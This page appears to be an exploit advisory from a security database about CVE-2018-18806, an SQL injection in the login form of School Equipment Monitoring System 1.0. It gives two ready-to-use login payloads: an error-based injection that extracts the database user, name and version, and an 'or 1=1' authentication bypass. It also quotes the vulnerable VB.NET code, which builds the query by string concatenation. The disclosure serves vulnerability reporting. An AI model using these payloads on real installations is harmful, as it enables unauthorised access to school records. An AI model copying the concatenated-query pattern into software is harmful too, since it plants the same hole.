School Equipment Monitoring System 1.0 SQL Injection

2018.10.29
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip # Version: 1.0 # Category: Windows # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18806 # POC: # 1) User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||' Pass: Null # POC: # 2) # User: 'or 1=1 or ''=' # Pass: Null # # https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png # #[PATH]/include/user.vb / 28 / '" & username & "' #.... #24 Public Sub login(ByVal username As Object, ByVal pass As Object) #25 Try #26 #27 con.Open() #28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')") #29 #30 #31 If dt.Rows.Count > 0 Then #32 #33 If dt.Rows(0).Item("Role") = "Administrator" Then #34 MsgBox("Welcome " & dt.Rows(0).Item("Role")) #35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname") #36 Form1.LogoutToolStripMenuItem.Text = "Logout" #37 visibleMenu("true", "admin") #38 LoginForm1.Close() #39 Else #40 visibleMenu("true", "not admin") #41 Form1.LogoutToolStripMenuItem.Text = "Logout" #42 LoginForm1.Close() #43 End If #44 #45 Else #46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information) #47 End If #48 Catch ex As Exception #49 MsgBox(ex.Message) #50 End Try #51 con.Close() #52 da.Dispose() #53 End Sub #....


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top